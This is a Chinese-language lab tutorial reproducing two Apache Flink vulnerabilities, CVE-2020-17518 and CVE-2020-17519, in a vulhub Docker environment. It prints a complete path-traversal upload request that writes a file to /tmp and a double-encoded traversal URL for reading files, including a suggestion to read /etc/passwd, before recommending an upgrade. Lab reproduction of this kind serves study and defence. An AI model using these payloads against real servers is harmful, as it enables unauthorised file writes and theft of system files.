您好,登錄后才能下訂單哦!
本篇文章為大家展示了如何進行Apache Flink 文件操作漏洞CVE-2020-17518及CVE-2020-17519的分析,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。
Apache Flink是近幾年大火的數據處理引擎。受到各大廠商的推崇并且已經應用與實際的業務場景中。很多公司在進行選型的時候都會選擇Apache Flink作為選型的對象。Flink核心是一個流式的數據流執行引擎,其針對數據流的分布式計算提供了數據分布、數據通信以及容錯機制等功能。基于流執行引擎,Flink提供了諸多更高抽象層的API以便用戶編寫分布式任務。
CVE-2020-17519
Apache Flink 1.11.0中引入的一個更改(也在1.11.1和1.11.2中發布)允許攻擊者通過JobManager進程的REST接口讀取JobManager本地文件系統上的任何文件。
CVE-2020-17518
Apache Flink 1.5.1引入了一個REST處理程序,允許您通過惡意修改的HTTP頭將上傳的文件寫入到本地文件系統上的任意位置。
CVE-2020-17519
1.11.0
1.11.1
1.11.2
CVE-2020-17518
Flink 1.5.1-1.11.2
1.本次漏洞環境使用vulhub的docker環境搭建,vulhub下載地址:
https://github.com/vulhub/vulhub/
2.下載完成后傳入裝有docker和docker-compose環境的虛擬機,進入目錄
cd vulhub-master/flink/CVE-2020-17519/
3.使用docker-compose up -d 拉取漏洞環境,因17519的漏洞環境版本是1.11.2所以復現兩個漏洞只需要一個漏洞環境即可。出現”done”表示拉取成功
4.在瀏覽器輸入http://your-ip:8081查看頁面
CVE-2020-17518復現
1、首先我們先使用CVE-2020-17518漏洞寫入文件,在首頁抓包構造以下構建數據包進行發送
POST /jars/upload HTTP/1.1
Host: your-ip:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=--------721072898
Content-Length: 149
----------721072898
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../../tmp/success"
success
----------721072898--
2.上面數據包返回的雖然是400但是已經寫入到docker中,進去docker查看
CVE-2020-17519復現
1.上面寫入后要是不能進入docker查看這里可以利用CVE-2020-17519漏洞進行文件讀取,在頁面首頁輸入以下payload查看tmp目錄下的文件
http://172.16.1.147:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsuccess
2.修改后面的payload改為查看etc下的passwd文件
建議升級到安全版本或最新版本。
上述內容就是如何進行Apache Flink 文件操作漏洞CVE-2020-17518及CVE-2020-17519的分析,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。